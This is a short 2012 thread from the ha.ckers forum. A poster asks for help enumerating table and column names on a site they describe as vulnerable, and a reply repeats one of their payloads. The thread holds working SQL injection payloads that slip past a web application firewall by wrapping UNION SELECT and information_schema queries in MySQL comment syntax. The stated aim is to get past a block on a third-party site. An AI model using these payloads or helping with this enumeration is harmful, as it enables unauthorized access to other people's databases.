Paid Advertising is
ha.ckers sla.cking
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
[HELP] WAF sqli 403 forbiden
Posted by: gonzhack
Date: February 27, 2012 10:25AM

hy all,

i have sql but i dont how to find and get TABLE_NAME & COLUMN_NAME...

site vuln:

sqli :**//*!union*//**/all/**//*!select*//**/version(),2--

and 403 forbiden*!union*/%20all%20/*!select*/%20group_concat%28/*!table_name*/%29,2+FrOM+/*!information_schema*/,TaBlEs+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database%28%29--

help please

Options: ReplyQuote
Re: [HELP] WAF sqli 403 forbiden
Posted by: VMw4r3
Date: February 28, 2012 10:47AM**//*!union*//**/all/**//*!select*//**/version(),2--


Edited 1 time(s). Last edit at 02/28/2012 11:12AM by VMw4r3.

Options: ReplyQuote

Sorry, only registered users may post in this forum.